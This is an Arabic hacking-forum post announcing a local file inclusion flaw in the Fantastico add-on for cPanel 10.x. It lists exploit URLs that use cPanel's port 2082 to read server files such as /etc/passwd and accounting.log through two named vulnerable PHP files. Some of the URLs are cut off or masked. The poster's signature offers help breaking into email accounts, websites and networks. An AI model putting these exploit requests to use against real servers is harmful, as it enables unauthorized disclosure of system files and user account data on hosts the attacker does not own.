عرض مشاركة واحدة

قديم 01-01-2009   #1
mostafa.ALIRAQI
بغدادي جديد
 
mostafa.ALIRAQI mostafa.ALIRAQI غير متواجد حالياً

ثغرة في Cpanel جديدة وسهلة وخطيرة

Fantastico In all Version Cpanel 10.x <= Local File Include

الوظيفة :

استعراض اي ملف على السيرفر ..

مكان الثغرة :

في برنامج Fantastico

الاستغلال :

xxx = عنوان الموقع

الثغرة الأولى :
الملف المصاب : load_*_**_**_**_**_**_**_**_*.php
http://www.xxx.com:2082/frontend/x/f...user/shell.php

يمكن استغلالها لعرض ملف الحسابات accounting.log

http://www.xxx.com:2082/frontend/x/f...accounting.log

وايضاًَ لعرض ملف اسماء المستخدمين passwd

http://www.xxx.com:2082/frontend/x/f..._*=/etc/passwd

الثغرة الثانية :
الملف المصاب : mysqlconfig.php

http://www.xxx.com:2082/frontend/x/f...th=/home/user/

يمكن استغلالها لعرض ملف الحسابات accounting.log

http://www.xxx.com:2082/frontend/x/f... counting.log

وايضاًَ لعرض ملف اسماء المستخدمين passwd

http://www.xxx.com:2082/frontend/x/f...th=/etc/passwd

طبعا اللها شرط الثغرا انو يكون مركب ومدعم سكريبت fantastico للتسوق وطبعا نسبة 95%
مركبين هالسكريبت

:59::59:

التوقيع: هكــــر بغــــداد




عندك سؤال يختص بالهكر اختراق اميل اختراق موقع اختراق حاسبة اختراق الشبكات الواير ليس اومثلن الغات الفجول بيسك وغيرها اتفضل ضيفني اتريد تتعرف علية لضيفني احسن
البريد الالكتروني
f0_p0@yahoo.com
  رد مع اقتباس